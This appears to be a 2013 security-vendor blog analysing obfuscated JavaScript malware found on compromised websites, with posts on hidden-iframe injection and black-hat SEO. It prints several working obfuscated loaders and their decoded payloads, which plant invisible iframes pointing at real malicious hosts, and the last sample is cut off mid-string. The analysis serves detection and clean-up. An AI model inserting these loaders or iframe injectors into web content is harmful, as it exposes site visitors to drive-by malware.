Thursday, August 22, 2013

JavaScript malware injecting malicious iframes in website pages

JavaScript malware on website injects hidden malicious iframes

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website is based in Canada and it hosts suspicious JavaScript in files.
More about malicious iframes detected on websites can be found in other posts.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed Aug 21 15:56:29 2013
Infected website's files:  4 
Website malware scan report link: http://goo.gl/STQqcz

Online Website Malware Scanner
Quttera Online Website Malware Scanner screenshot

Threat dump:

Website Malware Scanner
JavaScript malware detected. Screenshot from file analysis.


Malware entry


Malware entry details.

Beautified script

  1. function bt4t34b() {
  2.     return n[i];
  3. };
  4. ww = window;
  5. ss = String.fromCharCode;
  6. try {
  7.     document.body = ~1
  8. } catch (qwrbtwt) {
  9.     whwej = 12;
  10. } {
  11.     try {
  12.         whwej = ~2;
  13.     } catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     if (whwej) {
  17.         try {
  18.             document.body++;
  19.         } catch (bawetawe) {
  20.             if (ww.document) {
  21.                 n ="0x2d,0x6b,0x7a,0x73,0x68,0x79,0x6e,0x74,0x73,0x25,0x2d,0x2e,0x25,0x80,0x12,0xf,0x25,0x25,0x25,0x25,0x7b,0x66,0x77,0x25,0x6d,0x69,0x76,0x76,0x7c,0x25,0x42,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x68,0x77,0x6a,0x66,0x79,0x6a,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x2d,0x2c,0x6e,0x6b,0x77,0x66,0x72,0x6a,0x2c,0x2e,0x40,0x12,0xf,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x77,0x68,0x25,0x42,0x25,0x2c,0x6d,0x79,0x79,0x75,0x3f,0x34,0x34,0x6b,0x79,0x75,0x33,0x6d,0x6a,0x77,0x6d,0x66,0x79,0x79,0x66,0x73,0x73,0x7e,0x68,0x33,0x68,0x74,0x72,0x34,0x68,0x74,0x7a,0x73,0x79,0x33,0x75,0x6d,0x75,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x75,0x74,0x78,0x6e,0x79,0x6e,0x74,0x73,0x25,0x42,0x25,0x2c,0x66,0x67,0x78,0x74,0x71,0x7a,0x79,0x6a,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x67,0x74,0x77,0x69,0x6a,0x77,0x25,0x42,0x25,0x2c,0x35,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x6d,0x6a,0x6e,0x6c,0x6d,0x79,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x7c,0x6e,0x69,0x79,0x6d,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x71,0x6a,0x6b,0x79,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x79,0x74,0x75,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x12,0xf,0x25,0x25,0x25,0x25,0x6e,0x6b,0x25,0x2d,0x26,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x6c,0x6a,0x79,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x47,0x7e,0x4e,0x69,0x2d,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x2c,0x2e,0x2e,0x25,0x80,0x12,0xf,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x7c,0x77,0x6e,0x79,0x6a,0x2d,0x2c,0x41,0x69,0x6e,0x7b,0x25,0x6e,0x69,0x42,0x61,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x61,0x2c,0x43,0x41,0x34,0x69,0x6e,0x7b,0x43,0x2c,0x2e,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x6c,0x6a,0x79,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x47,0x7e,0x4e,0x69,0x2d,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x2c,0x2e,0x33,0x66,0x75,0x75,0x6a,0x73,0x69,0x48,0x6d,0x6e,0x71,0x69,0x2d,0x6d,0x69,0x76,0x76,0x7c,0x2e,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x82,0x12,0xf,0x82,0x2e,0x2d,0x2e,0x40".split(",");
  22.                 h = 2;
  23.                 s = "";
  24.                 for (= 0; i - 499 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(bt4t34b()) - 5));
  27.                 }
  28.                 z = s;
  29.                 eval("" + s);
  30.             }
  31.         }
  32.     }
  33. }

Malicious payload


Decoded payload generates hidden iframe to http://ftp.herhattannyc.com/count.php

  1. (function () {
  2.  
  3.     var hdqqw = document.createElement('iframe');
  4.  
  5.     hdqqw.src = 'http://ftp.herhattannyc.com/count.php';
  6.  
  7.     hdqqw.style.position = 'absolute';
  8.  
  9.     hdqqw.style.border = '0';
  10.  
  11.     hdqqw.style.height = '1px';
  12.  
  13.     hdqqw.style.width = '1px';
  14.  
  15.     hdqqw.style.left = '1px';
  16.  
  17.     hdqqw.style.top = '1px';
  18.  
  19.  
  20.  
  21.     if (!document.getElementById('hdqqw')) {
  22.  
  23.         document.write('<div id=\'hdqqw\'></div>');
  24.  
  25.         document.getElementById('hdqqw').appendChild(hdqqw);
  26.  
  27.     }
  28.  
  29. })();

Blacklisting status


The redirect URL is Malicious by on BitDefender and Fortinet as reported by VirusTotal.

VirusTotal report screenshot

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Tuesday, August 20, 2013

Say BlackHat SEO - Say Hidden Iframe

Top 9 obfuscated malicious JavaScript threats detected by Quttera's online malware scanner during last week


Background

In the cyber era more and more businesses and individuals using internet for products promotion, marketing, sales and business development. Advertisement budgets turned from newspapers and television towards the web technologies. More companies hunting for new customers in World Wide Web.

In internet marketing, the business starts from very simple thing - drive to product's website as match unique visitors as possible hoping that few percent of them finally will convert to real customers. But from another side in order to have big amount of unique visitors website must be pretty popular: highly visible in search engine result pages (generic search) and having high rank. The straight forward and expensive solution is internet advertising.

Unfortunately, new business can rarely afford any of these but still must, somehow, be able to gain unique visitors in order to survive. However, there is relatively simple and not expensive alternative to bring any website to top of search engine result pages and boost website rating using illegal techniques.

Such kind of services are often referred to as "Black hat SEO".

BlackHat SEO and hiddden iframes

SEO for “search engine optimization" and "black hat" relates to old black and white western movies where good guys used to wear white hats and bad guys were wearing black. So what is black hat SEO?

Black hat SEO is a process or actions that improve volume and quality of traffic to website using unethical techniques which in majority of cases violate search engine guidelines. For example SEO Spam Injection or BlackHat Cloacking. But in this post we want to talk about well-known and widely used traffic improvement technique that is based on hidden iframes

Injected in multiple websites over the world, such hidden iframes are leading to pages on the "promoting" website. They have very small or zero dimensions and often invisible to the visitor.

The major issue with this is that in very short period of time search engines recognize such kind of falsification and punish involved web site. This may be done by moving it down in search engine result pages or by simply blacklisting it.

Online Website Scanner statistics

Following is a top 9 of obfuscated JavaScript threats detected by Quttera public web malware scanner which used to generate and inject hidden iframes into external websites in order to increase traffic leading to "promoting" website. All of these threats were detected on compromised web servers which, if no promptly clean-up was done, were blacklisted by search engines.

Sample 1

  1. try {
  2.     if (window.document)--document.getElementById('12')
  3. } catch (qq) {
  4.     if (qq != null) ss = eval("St" + "ring");
  5. }
  6. ="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877d73732e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877d73733c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e877d73733c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877d73733c8182877a733c707d807273802e4b2e353e35491b182e877d73733c8182877a733c7673777576822e4b2e353f7e8635491b182e877d73733c8182877a733c85777282762e4b2e353f7e8635491b182e877d73733c8182877a733c7a7374822e4b2e353f7e8635491b182e877d73733c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877d73733537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877d73736a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877d737335373c6f7e7e737c725176777a7236877d737337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
  7. = [];
  8. for (= 0; i < a.length; i += 2) {
  9.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  10. }
  11. eval(ss["fr" + "omCharCode"].apply(ss, z));

Malicious action: injecting hidden iframe to www.eaglesunsystem.com 

  1. function zzzfff() {
  2.     var yoee = document.createElement('iframe');
  3.     yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
  4.     yoee.style.position = 'absolute';
  5.     yoee.style.border = '0';
  6.     yoee.style.height = '1px';
  7.     yoee.style.width = '1px';
  8.     yoee.style.left = '1px';
  9.     yoee.style.top = '1px';
  10.     if (!document.getElementById('yoee')) {
  11.         document.write('<div id=\'yoee\'></div>');
  12.         document.getElementById('yoee').appendChild(yoee);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }

Sample 2

  1. ff = String;
  2. fff = "fromCha" + "rCode";
  3. ff = ff[fff];
  4. zz = 3;
  5. try {
  6.     document.body % 26 = 5151
  7. } catch (bt4y34by) {
  8.     v = 123;
  9.     vzs = 0;
  10.     try {
  11.         document;
  12.     } catch (q) {
  13.         vzs = 1;
  14.     }
  15.     if (!vzs) e = eval;
  16.     if (1) {
  17.         f = new Array(04, 04, 0144, 0141, 033, 043, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142,0140, 0157, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140,043, 042, 0135, 0152, 0137, 0164, 042, 044, 0126, 053, 0130, 044, 0166, 010, 04, 04, 04, 0144, 0141, 0155, 0134,0150, 0140, 0155, 043, 044, 066, 010, 04, 04, 0170, 033, 0140, 0147, 0156, 0140, 033, 0166, 010, 04, 04, 04, 0137,0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0162, 0155, 0144, 0157, 0140, 043, 035, 067, 0144, 0141, 0155,0134, 0150, 0140, 033, 0156, 0155, 0136, 070, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147,0157, 0143, 0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051,0136, 0152, 0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141,064, 0141, 055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054,051, 0143, 0157, 0150, 0147, 042, 033, 0162, 0144, 0137, 0157, 0143, 070, 042, 054, 053, 053, 042, 033, 0143,0140, 0144, 0142, 0143, 0157, 070, 042, 054, 053, 053, 042, 033, 0156, 0157, 0164, 0147, 0140, 070, 042, 0162,0144, 0137, 0157, 0143, 065, 054, 053, 053, 0153, 0163, 066, 0143, 0140, 0144, 0142, 0143, 0157, 065, 054, 053,053, 0153, 0163, 066, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 065, 0134, 0135, 0156, 0152, 0147, 0160,0157, 0140, 066, 0161, 0144, 0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 065, 0143, 0144, 0137, 0137, 0140,0151, 066, 0147, 0140, 0141, 0157, 065, 050, 054, 053, 053, 053, 053, 0153, 0163, 066, 0157, 0152, 0153, 065, 053,066, 042, 071, 067, 052, 0144, 0141, 0155, 0134, 0150, 0140, 071, 035, 044, 066, 010, 04, 04, 0170, 010, 04, 04,0141, 0160, 0151, 0136, 0157, 0144, 0152, 0151, 033, 0144, 0141, 0155, 0134, 0150, 0140, 0155, 043, 044, 0166,010, 04, 04, 04, 0161, 0134, 0155, 033, 0141, 033, 070, 033, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051,0136, 0155, 0140, 0134, 0157, 0140, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 043, 042, 0144, 0141, 0155, 0134,0150, 0140, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043,042, 0156, 0155, 0136, 042, 047, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147, 0157, 0143,0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051, 0136, 0152,0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141, 064, 0141,055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054, 051, 0143,0157, 0150, 0147, 042, 044, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0147, 0140, 0141, 0157, 070, 042,050, 054, 053, 053, 053, 053, 0153, 0163, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0161, 0144,0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 070, 042, 0143, 0144, 0137, 0137, 0140, 0151, 042, 066, 0141, 051,0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141, 051, 0156, 0157, 0164, 0147,0140, 051, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 070, 042, 0134, 0135, 0156, 0152, 0147, 0160, 0157,0140, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141,051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043, 042, 0162, 0144, 0137, 0157,0143, 042, 047, 042, 054, 053, 053, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135,0160, 0157, 0140, 043, 042, 0143, 0140, 0144, 0142, 0143, 0157, 042, 047, 042, 054, 053, 053, 042, 044, 066, 010,04, 04, 04, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142, 0140, 0157, 0100, 0147, 0140, 0150, 0140,0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140, 043, 042, 0135, 0152, 0137, 0164, 042, 044,0126, 053, 0130, 051, 0134, 0153, 0153, 0140, 0151, 0137, 076, 0143, 0144, 0147, 0137, 043, 0141, 044, 066, 010,04, 04, 0170);
  18.     }
  19.     w = f;
  20.     s = [];
  21.     if (window.document)
  22.         for (= 2 - 2; - i + 724 != 0; i += 1) {
  23.             j = i;
  24.             if ((031 == 0x19))
  25.                 if (e) s = s + ff(w[j] + 5);
  26.         }
  27.     xz = e;
  28.     if (window.document) xz(s)
  29. }

Malicious action: injecting hidden iframe to http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html

  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html');
  9.     f.style.left = '-10000px';
  10.     f.style.visibility = 'hidden';
  11.     f.style.top = '0';
  12.     f.style.position = 'absolute';
  13.     f.style.top = '0';
  14.     f.setAttribute('width', '100');
  15.     f.setAttribute('height', '100');
  16.     document.getElementsByTagName('body')[0].appendChild(f);
  17. }


Sample 3

  1. ps = "s" + "p" + "l" + "i" + "t";
  2. asd = function () {
  3.     -- (d.body)
  4. };
  5. =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,177,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,177,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,151,174,172,166,153,154,150,171,162,65,151,154,66,115,166,173,166,172,66,71,156,162,175,140,127,131,136,65,167,157,167,56,102,24,21,47,177,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,177,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,177,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,177,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,177,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
  6. = document;
  7. for (= 0; i < a ondragstart = "return false;".length; i += 1) {
  8.     a[i] = -(10 - 3) + parseInt(a[i], 5 + 3);
  9. }
  10. try {
  11.     asd()
  12. } catch (q) {
  13.     yy = 50 - 50;
  14. }
  15. try {
  16.     yy /= 18
  17. } catch (pq) {
  18.     yy = 1;
  19. }
  20. if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));


Malicious action: injecting hidden iframe to http://busodeark.be/Fotos/2gkvYPRW.php


  1. function zzzfff() {
  2.     var x = document.createElement('iframe');
  3.     x.src = 'http://busodeark.be/Fotos/2gkvYPRW.php';
  4.     x.style.position = 'absolute';
  5.     x.style.border = '0';
  6.     x.style.height = '1px';
  7.     x.style.width = '1px';
  8.     x.style.left = '1px';
  9.     x.style.top = '1px';
  10.     if (!document.getElementById('x')) {
  11.         document.write('<div id=\'x\'></div>');
  12.         document.getElementById('x').appendChild(x);
  13.     }
  14. }
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  36. if (navigator.cookieEnabled)
  37. {
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Sample 4

  1. try {
  2.     if (window.document)--document.getElementById('12')
  3. } catch (qq) {
  4.     if (qq != null) ss = eval("St" + "ring");
  5. }
  6. ="74837c7182777d7c2e88888874747436372e89182e846f802e81857e7b2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e81857e7b3c8180712e4b2e357682827e483d3d72733b84738088737c723b817380847771733c7c7a3d4186887f805546823c7e767e3549182e81857e7b3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e81857e7b3c8182877a733c707d807273802e4b2e353e3549182e81857e7b3c8182877a733c7673777576822e4b2e35477e863549182e81857e7b3c8182877a733c85777282762e4b2e35457e863549182e81857e7b3c8182877a733c7a7374822e4b2e353f7e863549182e81857e7b3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363581857e7b3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3581857e7b6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363581857e7b35373c6f7e7e737c725176777a723681857e7b3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7